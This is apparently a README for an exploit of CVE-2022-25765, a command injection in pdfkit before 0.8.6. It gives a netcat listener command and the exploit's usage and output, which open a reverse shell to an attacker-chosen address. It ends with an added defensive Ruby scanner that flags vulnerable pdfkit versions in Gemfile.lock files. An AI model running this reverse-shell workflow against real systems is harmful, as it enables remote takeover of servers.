Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
See more details about the vulnerability here
Start a netcat listener on your host:
$ nc -lvnp 1337
Run the exploit (example):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Flags:
-t, --target Target address, in HTTP URL form
-a, --addr Address for the reverse connection
-p, --port Port for the reverse connection, 9001 by default
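
To check whether an application is exposed, the following added example (not part of this repository) scans Gemfile.lock text for a resolved pdfkit version below 0.8.6, the bound given at the top of this page. The sample lockfile contents and the function names are constructed for illustration.

```ruby
require "rubygems"

# First fixed release, per this page's "pdfkit < 0.8.6".
FIXED = Gem::Version.new("0.8.6")

# A resolved gem in Gemfile.lock's "specs:" list is indented four spaces.
# Dependency constraints (six spaces, e.g. "pdfkit (>= 0.8)") are not matched.
SPEC_LINE = /\A {4}pdfkit \(([^)]+)\)\s*\z/

# Returns every resolved pdfkit version found in the lockfile text.
def pdfkit_versions(lock_text)
  lock_text.each_line.filter_map do |line|
    m = SPEC_LINE.match(line.chomp)
    next unless m
    raw = m[1].split("-").first # drop a platform suffix if present
    Gem::Version.new(raw) if Gem::Version.correct?(raw)
  end
end

# Returns the resolved versions that predate the fix, as strings.
def vulnerable_pdfkit(lock_text)
  pdfkit_versions(lock_text).select { |v| v < FIXED }.map(&:to_s)
end

# Constructed sample lockfiles (not taken from any real project).
SAMPLE_OLD = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      pdfkit (0.8.4)
      reporter (1.0.0)
        pdfkit (>= 0.8)
LOCK

SAMPLE_FIXED = SAMPLE_OLD.sub("pdfkit (0.8.4)", "pdfkit (0.8.6)")

if __FILE__ == $PROGRAM_NAME
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_OLD
  hits = vulnerable_pdfkit(text)
  puts hits.empty? ? "no pdfkit below #{FIXED}" : "pdfkit below #{FIXED}: #{hits.join(', ')}"
end
```

Pass a path to a Gemfile.lock as the first argument to scan a real project; with no argument the script runs against the constructed sample.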